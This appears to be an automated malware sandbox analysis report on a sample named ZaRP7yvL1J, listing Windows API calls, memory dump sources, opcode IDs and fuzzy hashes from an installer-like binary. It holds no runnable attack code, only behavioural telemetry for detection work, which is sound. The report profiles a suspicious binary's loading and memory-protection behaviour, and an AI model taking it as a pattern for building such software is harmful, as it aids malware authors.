                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                            • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(6F95505C,00000004,00000040,6F95504C), ref: 6F9529B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: aefcaf4626e4d228b71b24da9c1b294afa98854bfcbf4e998983499f006df4e2
                                                                                                            • Instruction ID: 1d01bd9caebc8ed2ceaef3732e4045b70886593d7649695e5bb559720201d8d9
                                                                                                            • Opcode Fuzzy Hash: aefcaf4626e4d228b71b24da9c1b294afa98854bfcbf4e998983499f006df4e2
                                                                                                            • Instruction Fuzzy Hash: D6F092B0509B80DEEB90CF3C844471A3BE0B74A338B10452AE24CD6282E334947CCF91
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                            • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                            • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,6F95123B,?,6F9512DF,00000019,6F9511BE,-000000A0), ref: 6F951225
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761449716-0
                                                                                                            • Opcode ID: e6a8edd056ceb625bc7f50d56bdf990d41b1c5eac78b680d9db4ad7f60fea9d6
                                                                                                            • Instruction ID: ceed23450f7577abedeac71269d166721db99ad145d5138cb3b242e3cefaaa33
                                                                                                            • Opcode Fuzzy Hash: e6a8edd056ceb625bc7f50d56bdf990d41b1c5eac78b680d9db4ad7f60fea9d6
                                                                                                            • Instruction Fuzzy Hash: 2BB01270A0C400DFFF408B7CCC06F343264F701335F044000F604C0181C12048388D34
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A$Call
                                                                                                            • API String ID: 2624150263-413618503
                                                                                                            • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F95121B: GlobalAlloc.KERNELBASE(00000040,?,6F95123B,?,6F9512DF,00000019,6F9511BE,-000000A0), ref: 6F951225
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6F951C6B
                                                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 6F951CB3
                                                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 6F951CBD
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F951CD0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 6F951DB2
                                                                                                            • GlobalFree.KERNEL32(?), ref: 6F951DB7
                                                                                                            • GlobalFree.KERNEL32(?), ref: 6F951DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F951FA6
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 6F952140
                                                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 6F9521B5
                                                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 6F9521C6
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 6F952220
                                                                                                            • lstrlenW.KERNEL32(00000808), ref: 6F95223A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 245916457-0
                                                                                                            • Opcode ID: 7710de94d3ede34f5917c9b69c8ffe061551054efac9f84ad521514ea4a8f0fb
                                                                                                            • Instruction ID: 70ca590005620cde11e341bbceaea81b397346c53b0b0dbcad2396615f69ea9f
                                                                                                            • Opcode Fuzzy Hash: 7710de94d3ede34f5917c9b69c8ffe061551054efac9f84ad521514ea4a8f0fb
                                                                                                            • Instruction Fuzzy Hash: 4D229A71D44206DADB24CFB8C9846EEB7B8FF06315F10462AD1A5E61C0D774EAE9CB50
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID:
                                                                                                            • API String ID: 542301482-0
                                                                                                            • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                            • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                            • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: Call$N
                                                                                                            • API String ID: 3103080414-3438112850
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
